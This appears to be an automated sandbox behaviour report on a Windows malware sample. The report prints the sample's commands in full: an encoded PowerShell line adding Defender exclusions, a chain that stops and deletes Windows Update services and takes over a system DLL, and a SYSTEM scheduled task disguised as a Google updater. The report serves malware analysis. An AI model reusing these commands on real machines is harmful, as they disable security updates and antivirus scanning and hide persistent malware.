General
Target

a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.exe

Filesize

7MB

Completed

16-05-2022 00:56

Task

behavioral1

Score

10/10
MD5

95104aa61ed30687c13e5c644d5722f3

SHA1

f9788f808044d448f73203d93da0021cefb781ff

SHA256

a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301

SHA512

99dcd2463ad6c56eaeedbdd96c8ff0564aadb27b14f0ce047397e8791f1d886d07d104d76908e2ed7e3918c35ca52e643c1d02ed8bde16c76d18dc40b9b66bce

Malware Config
Signatures 12

Defense Evasion
Impact
Persistence
  • Modifies security service
    reg.exe

    TTPs

    Modify Registry, Modify Existing Service

    Reported IOCs

    description | ioc | process
    Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters | reg.exe
    Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security | reg.exe
  • Possible privilege escalation attempt
    takeown.exe, icacls.exe

    Reported IOCs

    pid | process
    1500 | takeown.exe
    1688 | icacls.exe
  • Stops running service(s)

    TTPs

    Modify Existing Service, Service Stop
  • Modifies file permissions
    takeown.exe, icacls.exe

    TTPs

    File Permissions Modification

    Reported IOCs

    pid | process
    1500 | takeown.exe
    1688 | icacls.exe
  • Drops file in System32 directory
    powershell.exe

    Reported IOCs

    description | ioc | process
    File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
  • Drops file in Program Files directory
    conhost.exe

    Reported IOCs

    description | ioc | process
    File created | C:\Program Files\Windows\services.exe | conhost.exe
    File opened for modification | C:\Program Files\Windows\services.exe | conhost.exe
  • Launches sc.exe

    Description

    Sc.exe is a Windows utility to control services on the system.

  • Creates scheduled task(s)
    schtasks.exe

    Description

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    TTPs

    Scheduled Task

    Reported IOCs

    pid | process
    280 | schtasks.exe
  • Modifies registry key
    reg.exe (9 instances)

    TTPs

    Modify Registry

    Reported IOCs

    pid | process
    1748 | reg.exe
    1628 | reg.exe
    1516 | reg.exe
    1632 | reg.exe
    316 | reg.exe
    1548 | reg.exe
    576 | reg.exe
    776 | reg.exe
    1600 | reg.exe
  • Suspicious behavior: EnumeratesProcesses
    powershell.exe, conhost.exe

    Reported IOCs

    pid | process
    1692 | powershell.exe
    1384 | conhost.exe
  • Suspicious use of AdjustPrivilegeToken
    powershell.exe, conhost.exe, takeown.exe

    Reported IOCs

    description | pid | process
    Token: SeDebugPrivilege | 1692 | powershell.exe
    Token: SeDebugPrivilege | 1384 | conhost.exe
    Token: SeTakeOwnershipPrivilege | 1500 | takeown.exe
  • Suspicious use of WriteProcessMemory
    a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.exe, conhost.exe, cmd.exe, cmd.exe, cmd.exe

    Reported IOCs

    description | pid | process | target process
    PID 1008 wrote to memory of 1384 | 1008 | a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.exe | conhost.exe
    PID 1384 wrote to memory of 2024 | 1384 | conhost.exe | cmd.exe
    PID 2024 wrote to memory of 1692 | 2024 | cmd.exe | powershell.exe
    PID 1384 wrote to memory of 588 | 1384 | conhost.exe | cmd.exe
    PID 588 wrote to memory of 580 | 588 | cmd.exe | sc.exe
    PID 588 wrote to memory of 1920 | 588 | cmd.exe | sc.exe
    PID 588 wrote to memory of 1176 | 588 | cmd.exe | sc.exe
    PID 588 wrote to memory of 700 | 588 | cmd.exe | sc.exe
    PID 588 wrote to memory of 1380 | 588 | cmd.exe | sc.exe
    PID 588 wrote to memory of 776 | 588 | cmd.exe | reg.exe
    PID 588 wrote to memory of 1600 | 588 | cmd.exe | reg.exe
    PID 588 wrote to memory of 1748 | 588 | cmd.exe | reg.exe
    PID 588 wrote to memory of 1628 | 588 | cmd.exe | reg.exe
    PID 588 wrote to memory of 1516 | 588 | cmd.exe | reg.exe
    PID 588 wrote to memory of 1500 | 588 | cmd.exe | takeown.exe
    PID 588 wrote to memory of 1688 | 588 | cmd.exe | icacls.exe
    PID 1384 wrote to memory of 1140 | 1384 | conhost.exe | cmd.exe
    PID 1140 wrote to memory of 280 | 1140 | cmd.exe | schtasks.exe
    PID 588 wrote to memory of 1632 | 588 | cmd.exe | reg.exe
    PID 588 wrote to memory of 316 | 588 | cmd.exe | reg.exe
    PID 588 wrote to memory of 1548 | 588 | cmd.exe | reg.exe
Processes 33
  • C:\Users\Admin\AppData\Local\Temp\a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.exe
    "C:\Users\Admin\AppData\Local\Temp\a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.exe"
    Suspicious use of WriteProcessMemory
    PID:1008
    • C:\Windows\System32\conhost.exe
      "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.exe"
      Drops file in Program Files directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1384
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAYQB1AGMAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBkAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQByAG8AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYQBqAGYAYQAjAD4A"
        Suspicious use of WriteProcessMemory
        PID:2024
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -EncodedCommand "PAAjAGUAYQB1AGMAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBkAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQByAG8AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYQBqAGYAYQAjAD4A"
          Drops file in System32 directory
          Suspicious behavior: EnumeratesProcesses
          Suspicious use of AdjustPrivilegeToken
          PID:1692
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
        Suspicious use of WriteProcessMemory
        PID:588
        • C:\Windows\system32\sc.exe
          sc stop wuauserv
          PID:1176
        • C:\Windows\system32\sc.exe
          sc stop WaaSMedicSvc
          PID:1920
        • C:\Windows\system32\sc.exe
          sc stop UsoSvc
          PID:580
        • C:\Windows\system32\sc.exe
          sc stop bits
          PID:700
        • C:\Windows\system32\sc.exe
          sc stop dosvc
          PID:1380
        • C:\Windows\system32\reg.exe
          reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
          Modifies registry key
          PID:776
        • C:\Windows\system32\reg.exe
          reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
          Modifies registry key
          PID:1600
        • C:\Windows\system32\reg.exe
          reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
          Modifies security service
          Modifies registry key
          PID:1748
        • C:\Windows\system32\reg.exe
          reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
          Modifies registry key
          PID:1628
        • C:\Windows\system32\takeown.exe
          takeown /f C:\Windows\System32\WaaSMedicSvc.dll
          Possible privilege escalation attempt
          Modifies file permissions
          Suspicious use of AdjustPrivilegeToken
          PID:1500
        • C:\Windows\system32\reg.exe
          reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
          Modifies registry key
          PID:1516
        • C:\Windows\system32\icacls.exe
          icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
          Possible privilege escalation attempt
          Modifies file permissions
          PID:1688
        • C:\Windows\system32\reg.exe
          reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
          Modifies registry key
          PID:1632
        • C:\Windows\system32\reg.exe
          reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
          Modifies registry key
          PID:316
        • C:\Windows\system32\reg.exe
          reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
          Modifies registry key
          PID:1548
        • C:\Windows\system32\reg.exe
          reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
          Modifies registry key
          PID:576
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
          PID:1856
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
          PID:1696
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
          PID:1016
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
          PID:808
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
          PID:1008
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
          PID:2028
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
          PID:1968
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Program Files\Windows\services.exe"
        Suspicious use of WriteProcessMemory
        PID:1140
        • C:\Windows\system32\schtasks.exe
          schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Program Files\Windows\services.exe"
          Creates scheduled task(s)
          PID:280
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
        PID:676
        • C:\Windows\system32\schtasks.exe
          schtasks /run /tn "GoogleUpdateTaskMachineQC"
          PID:864
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {8F1A1782-3646-432C-9F35-2195D7882870} S-1-5-18:NT AUTHORITY\System:Service:
    PID:1344
Network
MITRE ATT&CK Matrix
Collection, Command and Control, Credential Access, Discovery, Execution, Exfiltration, Impact, Initial Access, Lateral Movement, Privilege Escalation
                    Downloads